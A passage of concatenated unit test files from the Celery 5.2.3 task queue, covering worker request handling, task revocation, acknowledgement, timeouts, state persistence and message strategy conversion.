signal='TERM') def test_terminate__task_reserved(self): pool = Mock() job = self.get_request(self.mytask.s(1, f='x')) job.time_start = None job.terminate(pool, signal='TERM') pool.terminate_job.assert_not_called() assert job._terminate_on_ack == (pool, 15) job.terminate(pool, signal='TERM') def test_cancel__task_started(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_retry, sender=job.task, request=job._context, einfo=None): job.time_start = monotonic() job.worker_pid = 314 job.cancel(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) def test_cancel__task_reserved(self): pool = Mock() job = self.get_request(self.mytask.s(1, f='x')) job.time_start = None job.cancel(pool, signal='TERM') pool.terminate_job.assert_not_called() assert job._terminate_on_ack is None def test_revoked_expires_expired(self): job = self.get_request(self.mytask.s(1, f='x').set( expires=datetime.utcnow() - timedelta(days=1) )) with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=False, expired=True, signum=None): job.revoked() assert job.id in revoked self.app.set_current() assert self.mytask.backend.get_status(job.id) == states.REVOKED def test_revoked_expires_not_expired(self): job = self.xRequest( expires=datetime.utcnow() + timedelta(days=1), ) job.revoked() assert job.id not in revoked assert self.mytask.backend.get_status(job.id) != states.REVOKED def test_revoked_expires_ignore_result(self): self.mytask.ignore_result = True job = self.xRequest( expires=datetime.utcnow() - timedelta(days=1), ) job.revoked() assert job.id in revoked assert self.mytask.backend.get_status(job.id) != states.REVOKED def test_already_revoked(self): job = self.xRequest() job._already_revoked = True assert job.revoked() def test_revoked(self): job = self.xRequest() with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=False, expired=False, signum=None): revoked.add(job.id) assert job.revoked() assert job._already_revoked assert job.acknowledged def test_execute_does_not_execute_revoked(self): job = self.xRequest() revoked.add(job.id) job.execute() def test_execute_acks_late(self): self.mytask_raising.acks_late = True job = self.xRequest( name=self.mytask_raising.name, kwargs={}, ) job.execute() assert job.acknowledged job.execute() def test_execute_using_pool_does_not_execute_revoked(self): job = self.xRequest() revoked.add(job.id) with pytest.raises(TaskRevokedError): job.execute_using_pool(None) def test_on_accepted_acks_early(self): job = self.xRequest() job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert job.acknowledged prev, module._does_debug = module._does_debug, False try: job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) finally: module._does_debug = prev def test_on_accepted_acks_late(self): job = self.xRequest() self.mytask.acks_late = True job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert not job.acknowledged def test_on_accepted_terminates(self): signum = signal.SIGTERM pool = Mock() job = self.xRequest() with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.terminate(pool, signal='TERM') assert not pool.terminate_job.call_count job.on_accepted(pid=314, time_accepted=monotonic()) pool.terminate_job.assert_called_with(314, signum) def 
test_on_accepted_time_start(self): job = self.xRequest() job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert time() - job.time_start < 1 def test_on_success_acks_early(self): job = self.xRequest() job.time_start = 1 job.on_success((0, 42, 0.001)) prev, module._does_info = module._does_info, False try: job.on_success((0, 42, 0.001)) assert not job.acknowledged finally: module._does_info = prev def test_on_success_BaseException(self): job = self.xRequest() job.time_start = 1 with pytest.raises(SystemExit): try: raise SystemExit() except SystemExit: job.on_success((1, ExceptionInfo(), 0.01)) else: assert False def test_on_success_eventer(self): job = self.xRequest() job.time_start = 1 job.eventer = Mock() job.eventer.send = Mock() job.on_success((0, 42, 0.001)) job.eventer.send.assert_called() def test_on_success_when_failure(self): job = self.xRequest() job.time_start = 1 job.on_failure = Mock() try: raise KeyError('foo') except Exception: job.on_success((1, ExceptionInfo(), 0.001)) job.on_failure.assert_called() def test_on_success_acks_late(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True job.on_success((0, 42, 0.001)) assert job.acknowledged def test_on_failure_WorkerLostError(self): def get_ei(): try: raise WorkerLostError('do re mi') except WorkerLostError: return ExceptionInfo() job = self.xRequest() exc_info = get_ei() job.on_failure(exc_info) self.app.set_current() assert self.mytask.backend.get_status(job.id) == states.FAILURE self.mytask.ignore_result = True exc_info = get_ei() job = self.xRequest() job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_on_failure_acks_late_reject_on_worker_lost_enabled(self): try: raise WorkerLostError() except WorkerLostError: exc_info = ExceptionInfo() self.mytask.acks_late = True self.mytask.reject_on_worker_lost = True job = self.xRequest() job.delivery_info['redelivered'] = False job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING job = self.xRequest() job.delivery_info['redelivered'] = True job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_on_failure_acks_late(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged def test_on_failure_acks_on_failure_or_timeout_disabled_for_task(self): job = self.xRequest() job.time_start = 1 job._on_reject = Mock() self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = False try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True job._on_reject.assert_called_with(req_logger, job.connection_errors, False) def test_on_failure_acks_on_failure_or_timeout_enabled_for_task(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True def test_on_failure_acks_on_failure_or_timeout_disabled(self): self.app.conf.acks_on_failure_or_timeout = False job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = False try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True job._on_reject.assert_called_with(req_logger, 
job.connection_errors, False) self.app.conf.acks_on_failure_or_timeout = True def test_on_failure_acks_on_failure_or_timeout_enabled(self): self.app.conf.acks_on_failure_or_timeout = True job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True def test_on_failure_task_cancelled(self): job = self.xRequest() job.eventer = Mock() job.time_start = 1 job._already_cancelled = True try: raise Terminated() except Terminated: exc_info = ExceptionInfo() job.on_failure(exc_info) job.on_failure(exc_info) assert not job.eventer.send.called def test_from_message_invalid_kwargs(self): m = self.TaskMessage(self.mytask.name, args=(), kwargs='foo') req = Request(m, app=self.app) with pytest.raises(InvalidTaskError): raise req.execute().exception def test_on_hard_timeout_acks_late(self, patching): error = patching('celery.worker.request.error') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_called_with() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = False job.on_timeout(soft=False, timeout=1335) job.acknowledge.assert_not_called() def test_on_hard_timeout_acks_on_failure_or_timeout(self, patching): error = patching('celery.worker.request.error') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.task.acks_on_failure_or_timeout = True job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_called_with() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.task.acks_on_failure_or_timeout = False job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_not_called() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = False job.task.acks_on_failure_or_timeout = True job.on_timeout(soft=False, timeout=1335) job.acknowledge.assert_not_called() def test_on_soft_timeout(self, patching): warn = patching('celery.worker.request.warn') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.on_timeout(soft=True, timeout=1337) assert 'Soft time limit' in warn.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.PENDING job.acknowledge.assert_not_called() self.mytask.ignore_result = True job = self.xRequest() job.on_timeout(soft=True, timeout=1336) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_fast_trace_task(self): assert self.app.use_fast_trace_task is False setup_worker_optimizations(self.app) assert self.app.use_fast_trace_task is True tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) assert len(message.payload) == 3 try: self.mytask.__trace__ = build_tracer( self.mytask.name, self.mytask, self.app.loader, 'test', app=self.app, ) failed, res, runtime = fast_trace_task( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding) assert not failed assert res == repr(4 ** 4) assert runtime is not None assert isinstance(runtime, numbers.Real) finally: 
reset_worker_optimizations(self.app) assert self.app.use_fast_trace_task is False delattr(self.mytask, '__trace__') failed, res, runtime = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert not failed assert res == repr(4 ** 4) assert runtime is not None assert isinstance(runtime, numbers.Real) def test_trace_task_ret(self): self.mytask.__trace__ = build_tracer( self.mytask.name, self.mytask, self.app.loader, 'test', app=self.app, ) tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) _, R, _ = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert R == repr(4 ** 4) def test_trace_task_ret__no_trace(self): try: delattr(self.mytask, '__trace__') except AttributeError: pass tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) _, R, _ = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert R == repr(4 ** 4) def test_trace_catches_exception(self): @self.app.task(request=None, shared=False) def raising(): raise KeyError('baz') with pytest.warns(RuntimeWarning): res = trace_task(raising, uuid(), [], {}, app=self.app)[0] assert isinstance(res, ExceptionInfo) def test_worker_task_trace_handle_retry(self): tid = uuid() self.mytask.push_request(id=tid) try: raise ValueError('foo') except Exception as exc: try: raise Retry(str(exc), exc=exc) except Retry as exc: w = TraceInfo(states.RETRY, exc) w.handle_retry( self.mytask, self.mytask.request, store_errors=False, ) assert self.mytask.backend.get_status(tid) == states.PENDING w.handle_retry( self.mytask, self.mytask.request, store_errors=True, ) assert self.mytask.backend.get_status(tid) == states.RETRY finally: self.mytask.pop_request() def test_worker_task_trace_handle_failure(self): tid = uuid() self.mytask.push_request() try: self.mytask.request.id = tid try: raise ValueError('foo') except Exception as exc: w = TraceInfo(states.FAILURE, exc) w.handle_failure( self.mytask, self.mytask.request, store_errors=False, ) assert self.mytask.backend.get_status(tid) == states.PENDING w.handle_failure( self.mytask, self.mytask.request, store_errors=True, ) assert self.mytask.backend.get_status(tid) == states.FAILURE finally: self.mytask.pop_request() def test_from_message(self): us = 'æØåveéðƒeæ' tid = uuid() m = self.TaskMessage( self.mytask.name, tid, args=[2], kwargs={us: 'bar'}, ) job = Request(m, app=self.app) assert isinstance(job, Request) assert job.name == self.mytask.name assert job.id == tid assert job.message is m def test_from_message_empty_args(self): tid = uuid() m = self.TaskMessage(self.mytask.name, tid, args=[], kwargs={}) job = Request(m, app=self.app) assert isinstance(job, Request) def test_from_message_missing_required_fields(self): m = self.TaskMessage(self.mytask.name) m.headers.clear() with pytest.raises(KeyError): Request(m, app=self.app) def test_from_message_nonexistant_task(self): m = self.TaskMessage( 'cu.mytask.doesnotexist', args=[2], kwargs={'æØåveéðƒeæ': 'bar'}, ) with pytest.raises(KeyError): Request(m, app=self.app) def test_execute(self): tid = uuid() job = self.xRequest(id=tid, args=[4], kwargs={}) assert job.execute() == 256 meta = self.mytask.backend.get_task_meta(tid) assert meta['status'] == states.SUCCESS assert meta['result'] == 256 def test_execute_backend_error_acks_late(self): """direct call to execute should 
reject task in case of internal failure.""" tid = uuid() self.mytask.acks_late = True job = self.xRequest(id=tid, args=[4], kwargs={}) job._on_reject = Mock() job._on_ack = Mock() self.mytask.backend = BaseDictBackend(app=self.app) self.mytask.backend.mark_as_done = Mock() self.mytask.backend.mark_as_done.side_effect = Exception() self.mytask.backend.mark_as_failure = Mock() self.mytask.backend.mark_as_failure.side_effect = Exception() job.execute() assert job.acknowledged job._on_reject.assert_called_once() job._on_ack.assert_not_called() def test_execute_success_no_kwargs(self): @self.app.task # traverses coverage for decorator without parens def mytask_no_kwargs(i): return i ** i tid = uuid() job = self.xRequest( name=mytask_no_kwargs.name, id=tid, args=[4], kwargs={}, ) assert job.execute() == 256 meta = mytask_no_kwargs.backend.get_task_meta(tid) assert meta['result'] == 256 assert meta['status'] == states.SUCCESS def test_execute_ack(self): scratch = {'ACK': False} def on_ack(*args, **kwargs): scratch['ACK'] = True tid = uuid() job = self.xRequest(id=tid, args=[4], on_ack=on_ack) assert job.execute() == 256 meta = self.mytask.backend.get_task_meta(tid) assert scratch['ACK'] assert meta['result'] == 256 assert meta['status'] == states.SUCCESS def test_execute_fail(self): tid = uuid() job = self.xRequest( name=self.mytask_raising.name, id=tid, args=[4], kwargs={}, ) assert isinstance(job.execute(), ExceptionInfo) assert self.mytask_raising.backend.serializer == 'pickle' meta = self.mytask_raising.backend.get_task_meta(tid) assert meta['status'] == states.FAILURE assert isinstance(meta['result'], KeyError) def test_execute_using_pool(self): tid = uuid() job = self.xRequest(id=tid, args=[4]) p = Mock() job.execute_using_pool(p) p.apply_async.assert_called_once() trace = p.apply_async.call_args[0][0] assert trace == trace_task_ret args = p.apply_async.call_args[1]['args'] assert args[0] == self.mytask.name assert args[1] == tid assert args[2] == job.request_dict assert args[3] == job.message.body def test_execute_using_pool_fast_trace_task(self): self.app.use_fast_trace_task = True tid = uuid() job = self.xRequest(id=tid, args=[4]) p = Mock() job.execute_using_pool(p) p.apply_async.assert_called_once() trace = p.apply_async.call_args[0][0] assert trace == fast_trace_task args = p.apply_async.call_args[1]['args'] assert args[0] == self.mytask.name assert args[1] == tid assert args[2] == job.request_dict assert args[3] == job.message.body def _test_on_failure(self, exception, **kwargs): tid = uuid() job = self.xRequest(id=tid, args=[4]) job.send_event = Mock(name='send_event') job.task.backend.mark_as_failure = Mock(name='mark_as_failure') try: raise exception except type(exception): exc_info = ExceptionInfo() job.on_failure(exc_info, **kwargs) job.send_event.assert_called() return job def test_on_failure(self): self._test_on_failure(Exception('Inside unit tests')) def test_on_failure__unicode_exception(self): self._test_on_failure(Exception('Бобры атакуют')) def test_on_failure__utf8_exception(self): self._test_on_failure(Exception( from_utf8('Бобры атакуют'))) def test_on_failure__WorkerLostError(self): exc = WorkerLostError() job = self._test_on_failure(exc) job.task.backend.mark_as_failure.assert_called_with( job.id, exc, request=job._context, store_result=True, ) def test_on_failure__return_ok(self): self._test_on_failure(KeyError(), return_ok=True) def test_reject(self): job = self.xRequest(id=uuid()) job.on_reject = Mock(name='on_reject') job.reject(requeue=True) 
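# reject(requeue=True) must forward the requeue flag to on_reject, mark the
# message as handled (acknowledged), and treat a second reject as a no-op.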
job.on_reject.assert_called_with( req_logger, job.connection_errors, True, ) assert job.acknowledged job.on_reject.reset_mock() job.reject(requeue=True) job.on_reject.assert_not_called() def test_group(self): gid = uuid() job = self.xRequest(id=uuid(), group=gid) assert job.group == gid def test_group_index(self): group_index = 42 job = self.xRequest(id=uuid(), group_index=group_index) assert job.group_index == group_index class test_create_request_class(RequestCase): def setup(self): self.task = Mock(name='task') self.pool = Mock(name='pool') self.eventer = Mock(name='eventer') super().setup() def create_request_cls(self, **kwargs): return create_request_cls( Request, self.task, self.pool, 'foo', self.eventer, app=self.app, **kwargs ) def zRequest(self, Request=None, revoked_tasks=None, ref=None, **kwargs): return self.xRequest( Request=Request or self.create_request_cls( ref=ref, revoked_tasks=revoked_tasks, ), **kwargs) def test_on_success(self): self.zRequest(id=uuid()).on_success((False, 'hey', 3.1222)) def test_on_success__SystemExit(self, errors=(SystemExit, KeyboardInterrupt)): for exc in errors: einfo = None try: raise exc() except exc: einfo = ExceptionInfo() with pytest.raises(exc): self.zRequest(id=uuid()).on_success((True, einfo, 1.0)) def test_on_success__calls_failure(self): job = self.zRequest(id=uuid()) einfo = Mock(name='einfo') job.on_failure = Mock(name='on_failure') job.on_success((True, einfo, 1.0)) job.on_failure.assert_called_with(einfo, return_ok=True) def test_on_success__acks_late_enabled(self): self.task.acks_late = True job = self.zRequest(id=uuid()) job.acknowledge = Mock(name='ack') job.on_success((False, 'foo', 1.0)) job.acknowledge.assert_called_with() def test_on_success__acks_late_disabled(self): self.task.acks_late = False job = self.zRequest(id=uuid()) job.acknowledge = Mock(name='ack') job.on_success((False, 'foo', 1.0)) job.acknowledge.assert_not_called() def test_on_success__no_events(self): self.eventer = None job = self.zRequest(id=uuid()) job.send_event = Mock(name='send_event') job.on_success((False, 'foo', 1.0)) job.send_event.assert_not_called() def test_on_success__with_events(self): job = self.zRequest(id=uuid()) job.send_event = Mock(name='send_event') job.on_success((False, 'foo', 1.0)) job.send_event.assert_called_with( 'task-succeeded', result='foo', runtime=1.0, ) def test_execute_using_pool__revoked(self): tid = uuid() job = self.zRequest(id=tid, revoked_tasks={tid}) job.revoked = Mock() job.revoked.return_value = True with pytest.raises(TaskRevokedError): job.execute_using_pool(self.pool) def test_execute_using_pool__expired(self): tid = uuid() job = self.zRequest(id=tid, revoked_tasks=set()) job.expires = 1232133 job.revoked = Mock() job.revoked.return_value = True with pytest.raises(TaskRevokedError): job.execute_using_pool(self.pool) def test_execute_using_pool(self): weakref_ref = Mock(name='weakref.ref') job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref) job.execute_using_pool(self.pool) self.pool.apply_async.assert_called_with( trace_task_ret, args=(job.type, job.id, job.request_dict, job.body, job.content_type, job.content_encoding), accept_callback=job.on_accepted, timeout_callback=job.on_timeout, callback=job.on_success, error_callback=job.on_failure, soft_timeout=self.task.soft_time_limit, timeout=self.task.time_limit, correlation_id=job.id, ) assert job._apply_result weakref_ref.assert_called_with(self.pool.apply_async()) assert job._apply_result is weakref_ref() def 
test_execute_using_pool_with_use_fast_trace_task(self):
        self.app.use_fast_trace_task = True
        weakref_ref = Mock(name='weakref.ref')
        job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref)
        job.execute_using_pool(self.pool)
        self.pool.apply_async.assert_called_with(
            fast_trace_task,
            args=(job.type, job.id, job.request_dict, job.body,
                  job.content_type, job.content_encoding),
            accept_callback=job.on_accepted,
            timeout_callback=job.on_timeout,
            callback=job.on_success,
            error_callback=job.on_failure,
            soft_timeout=self.task.soft_time_limit,
            timeout=self.task.time_limit,
            correlation_id=job.id,
        )
        assert job._apply_result
        weakref_ref.assert_called_with(self.pool.apply_async())
        assert job._apply_result is weakref_ref()

    def test_execute_using_pool_with_none_timelimit_header(self):
        weakref_ref = Mock(name='weakref.ref')
        job = self.zRequest(id=uuid(),
                            revoked_tasks=set(),
                            ref=weakref_ref,
                            headers={'timelimit': None})
        job.execute_using_pool(self.pool)
        self.pool.apply_async.assert_called_with(
            trace_task_ret,
            args=(job.type, job.id, job.request_dict, job.body,
                  job.content_type, job.content_encoding),
            accept_callback=job.on_accepted,
            timeout_callback=job.on_timeout,
            callback=job.on_success,
            error_callback=job.on_failure,
            soft_timeout=self.task.soft_time_limit,
            timeout=self.task.time_limit,
            correlation_id=job.id,
        )
        assert job._apply_result
        weakref_ref.assert_called_with(self.pool.apply_async())
        assert job._apply_result is weakref_ref()

    def test_execute_using_pool__defaults_of_hybrid_to_proto2(self):
        weakref_ref = Mock(name='weakref.ref')
        headers = strategy.hybrid_to_proto2(
            Mock(headers=None), {'id': uuid(), 'task': self.mytask.name})[1]
        job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers)
        job.execute_using_pool(self.pool)
        assert job._apply_result
        weakref_ref.assert_called_with(self.pool.apply_async())
        assert job._apply_result is weakref_ref()


# ---- celery-5.2.3/t/unit/worker/test_revoke.py ----

from celery.worker import state


class test_revoked:

    def test_is_working(self):
        state.revoked.add('foo')
        assert 'foo' in state.revoked
        state.revoked.pop_value('foo')
        assert 'foo' not in state.revoked


# ---- celery-5.2.3/t/unit/worker/test_state.py ----

import pickle
from time import time
from unittest.mock import Mock, patch

import pytest

from celery import uuid
from celery.exceptions import WorkerShutdown, WorkerTerminate
from celery.platforms import EX_OK
from celery.utils.collections import LimitedSet
from celery.worker import state


@pytest.fixture
def reset_state():
    yield
    state.active_requests.clear()
    state.revoked.clear()
    state.total_count.clear()


class MockShelve(dict):
    filename = None
    in_sync = False
    closed = False

    def open(self, filename, **kwargs):
        self.filename = filename
        return self

    def sync(self):
        self.in_sync = True

    def close(self):
        self.closed = True


class MyPersistent(state.Persistent):
    storage = MockShelve()


class test_maybe_shutdown:

    def teardown(self):
        state.should_stop = None
        state.should_terminate = None

    def test_should_stop(self):
        state.should_stop = True
        with pytest.raises(WorkerShutdown):
            state.maybe_shutdown()
        state.should_stop = 0
        with pytest.raises(WorkerShutdown):
            state.maybe_shutdown()
        state.should_stop = False
        try:
            state.maybe_shutdown()
        except SystemExit:
            raise RuntimeError('should not have exited')
        state.should_stop = None
        try:
            state.maybe_shutdown()
        except SystemExit:
            raise RuntimeError('should not have exited')
        state.should_stop = 0
        try:
            state.maybe_shutdown()
        except SystemExit as exc:
            assert exc.code == 0
        else:
            raise RuntimeError('should have exited')
        state.should_stop = 303
        try:
            state.maybe_shutdown()
        except SystemExit as exc:
            assert exc.code == 303
        else:
            raise RuntimeError('should have exited')

    @pytest.mark.parametrize('should_stop', (None, False, True, EX_OK))
    def test_should_terminate(self, should_stop):
        state.should_stop = should_stop
        state.should_terminate = True
        with pytest.raises(WorkerTerminate):
            state.maybe_shutdown()


@pytest.mark.usefixtures('reset_state')
class test_Persistent:

    @pytest.fixture
    def p(self):
        return MyPersistent(state, filename='celery-state')

    def test_close_twice(self, p):
        p._is_open = False
        p.close()

    def test_constructor(self, p):
        assert p.db == {}
        assert p.db.filename == p.filename

    def test_save(self, p):
        p.db['foo'] = 'bar'
        p.save()
        assert p.db.in_sync
        assert p.db.closed

    def add_revoked(self, p, *ids):
        for id in ids:
            p.db.setdefault('revoked', LimitedSet()).add(id)

    def test_merge(self, p, data=['foo', 'bar', 'baz']):
        state.revoked.update(data)
        p.merge()
        for item in data:
            assert item in state.revoked

    def test_merge_dict(self, p):
        p.clock = Mock()
        p.clock.adjust.return_value = 626
        d = {'revoked': {'abc': time()}, 'clock': 313}
        p._merge_with(d)
        p.clock.adjust.assert_called_with(313)
        assert d['clock'] == 626
        assert 'abc' in state.revoked

    def test_sync_clock_and_purge(self, p):
        passthrough = Mock()
        passthrough.side_effect = lambda x: x
        with patch('celery.worker.state.revoked') as revoked:
            d = {'clock': 0}
            p.clock = Mock()
            p.clock.forward.return_value = 627
            p._dumps = passthrough
            p.compress = passthrough
            p._sync_with(d)
            revoked.purge.assert_called_with()
            assert d['clock'] == 627
            assert 'revoked' not in d
            assert d['zrevoked'] is revoked

    def test_sync(self, p,
                  data1=['foo', 'bar', 'baz'],
                  data2=['baz', 'ini', 'koz']):
        self.add_revoked(p, *data1)
        for item in data2:
            state.revoked.add(item)
        p.sync()
        assert p.db['zrevoked']
        pickled = p.decompress(p.db['zrevoked'])
        assert pickled
        saved = pickle.loads(pickled)
        for item in data2:
            assert item in saved


class SimpleReq:

    def __init__(self, name):
        self.id = uuid()
        self.name = name


@pytest.mark.usefixtures('reset_state')
class test_state:

    def test_accepted(self, requests=[SimpleReq('foo'),
                                      SimpleReq('bar'),
                                      SimpleReq('baz'),
                                      SimpleReq('baz')]):
        for request in requests:
            state.task_accepted(request)
        for req in requests:
            assert req in state.active_requests
        assert state.total_count['foo'] == 1
        assert state.total_count['bar'] == 1
        assert state.total_count['baz'] == 2

    def test_ready(self, requests=[SimpleReq('foo'),
                                   SimpleReq('bar')]):
        for request in requests:
            state.task_accepted(request)
        assert len(state.active_requests) == 2
        for request in requests:
            state.task_ready(request)
        assert len(state.active_requests) == 0


# ---- celery-5.2.3/t/unit/worker/test_strategy.py ----

import logging
from collections import defaultdict
from contextlib import contextmanager
from unittest.mock import ANY, Mock, patch

import pytest
from kombu.utils.limits import TokenBucket

from celery import Task, signals
from celery.app.trace import LOG_RECEIVED
from celery.exceptions import
InvalidTaskError from celery.utils.time import rate from celery.worker import state from celery.worker.request import Request from celery.worker.strategy import default as default_strategy from celery.worker.strategy import hybrid_to_proto2, proto1_to_proto2 class test_proto1_to_proto2: def setup(self): self.message = Mock(name='message') self.body = { 'args': (1,), 'kwargs': {'foo': 'baz'}, 'utc': False, 'taskset': '123', } def test_message_without_args(self): self.body.pop('args') body, _, _, _ = proto1_to_proto2(self.message, self.body) assert body[:2] == ((), {'foo': 'baz'}) def test_message_without_kwargs(self): self.body.pop('kwargs') body, _, _, _ = proto1_to_proto2(self.message, self.body) assert body[:2] == ((1,), {}) def test_message_kwargs_not_mapping(self): self.body['kwargs'] = (2,) with pytest.raises(InvalidTaskError): proto1_to_proto2(self.message, self.body) def test_message_no_taskset_id(self): self.body.pop('taskset') assert proto1_to_proto2(self.message, self.body) def test_message(self): body, headers, decoded, utc = proto1_to_proto2(self.message, self.body) assert body == ((1,), {'foo': 'baz'}, { 'callbacks': None, 'errbacks': None, 'chord': None, 'chain': None, }) assert headers == dict(self.body, group='123') assert decoded assert not utc class test_default_strategy_proto2: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add def get_message_class(self): return self.TaskMessage def prepare_message(self, message): return message class Context: def __init__(self, sig, s, reserved, consumer, message): self.sig = sig self.s = s self.reserved = reserved self.consumer = consumer self.message = message def __call__(self, callbacks=[], **kwargs): return self.s( self.message, (self.message.payload if not self.message.headers.get('id') else None), self.message.ack, self.message.reject, callbacks, **kwargs ) def was_reserved(self): return self.reserved.called def was_rate_limited(self): assert not self.was_reserved() return self.consumer._limit_task.called def was_limited_with_eta(self): assert not self.was_reserved() called = self.consumer.timer.call_at.called if called: assert self.consumer.timer.call_at.call_args[0][1] == \ self.consumer._limit_post_eta return called def was_scheduled(self): assert not self.was_reserved() assert not self.was_rate_limited() return self.consumer.timer.call_at.called def event_sent(self): return self.consumer.event_dispatcher.send.call_args def get_request(self): if self.was_reserved(): return self.reserved.call_args[0][0] if self.was_rate_limited(): return self.consumer._limit_task.call_args[0][0] if self.was_scheduled(): return self.consumer.timer.call_at.call_args[0][0] raise ValueError('request not handled') @contextmanager def _context(self, sig, rate_limits=True, events=True, utc=True, limit=None): assert sig.type.Strategy assert sig.type.Request reserved = Mock() consumer = Mock() consumer.task_buckets = defaultdict(lambda: None) if limit: bucket = TokenBucket(rate(limit), capacity=1) consumer.task_buckets[sig.task] = bucket consumer.controller.state.revoked = set() consumer.disable_rate_limits = not rate_limits consumer.event_dispatcher.enabled = events s = sig.type.start_strategy(self.app, consumer, task_reserved=reserved) assert s message = self.task_message_from_sig( self.app, sig, utc=utc, TaskMessage=self.get_message_class(), ) message = self.prepare_message(message) yield self.Context(sig, s, reserved, consumer, message) def test_when_logging_disabled(self, caplog): # Capture logs at any level 
above `NOTSET` caplog.set_level(logging.NOTSET + 1, logger="celery.worker.strategy") with patch('celery.worker.strategy.logger') as logger: logger.isEnabledFor.return_value = False with self._context(self.add.s(2, 2)) as C: C() assert not caplog.records def test_task_strategy(self): with self._context(self.add.s(2, 2)) as C: C() assert C.was_reserved() req = C.get_request() C.consumer.on_task_request.assert_called_with(req) assert C.event_sent() def test_callbacks(self): with self._context(self.add.s(2, 2)) as C: callbacks = [Mock(name='cb1'), Mock(name='cb2')] C(callbacks=callbacks) req = C.get_request() for callback in callbacks: callback.assert_called_with(req) def test_log_task_received(self, caplog): caplog.set_level(logging.INFO, logger="celery.worker.strategy") with self._context(self.add.s(2, 2)) as C: C() for record in caplog.records: if record.msg == LOG_RECEIVED: assert record.levelno == logging.INFO break else: raise ValueError("Expected message not in captured log records") def test_log_task_received_custom(self, caplog): caplog.set_level(logging.INFO, logger="celery.worker.strategy") custom_fmt = "CUSTOM MESSAGE" with self._context( self.add.s(2, 2) ) as C, patch( "celery.app.trace.LOG_RECEIVED", new=custom_fmt, ): C() for record in caplog.records: if record.msg == custom_fmt: assert set(record.args) == {"id", "name", "kwargs", "args"} break else: raise ValueError("Expected message not in captured log records") def test_signal_task_received(self): callback = Mock() with self._context(self.add.s(2, 2)) as C: signals.task_received.connect(callback) C() callback.assert_called_once_with(sender=C.consumer, request=ANY, signal=signals.task_received) def test_when_events_disabled(self): with self._context(self.add.s(2, 2), events=False) as C: C() assert C.was_reserved() assert not C.event_sent() def test_eta_task(self): with self._context(self.add.s(2, 2).set(countdown=10)) as C: C() assert C.was_scheduled() C.consumer.qos.increment_eventually.assert_called_with() def test_eta_task_utc_disabled(self): with self._context(self.add.s(2, 2).set(countdown=10), utc=False) as C: C() assert C.was_scheduled() C.consumer.qos.increment_eventually.assert_called_with() def test_when_rate_limited(self): task = self.add.s(2, 2) with self._context(task, rate_limits=True, limit='1/m') as C: C() assert C.was_rate_limited() def test_when_rate_limited_with_eta(self): task = self.add.s(2, 2).set(countdown=10) with self._context(task, rate_limits=True, limit='1/m') as C: C() assert C.was_limited_with_eta() C.consumer.qos.increment_eventually.assert_called_with() def test_when_rate_limited__limits_disabled(self): task = self.add.s(2, 2) with self._context(task, rate_limits=False, limit='1/m') as C: C() assert C.was_reserved() def test_when_revoked(self): task = self.add.s(2, 2) task.freeze() try: with self._context(task) as C: C.consumer.controller.state.revoked.add(task.id) state.revoked.add(task.id) C() with pytest.raises(ValueError): C.get_request() finally: state.revoked.discard(task.id) class test_default_strategy_proto1(test_default_strategy_proto2): def get_message_class(self): return self.TaskMessage1 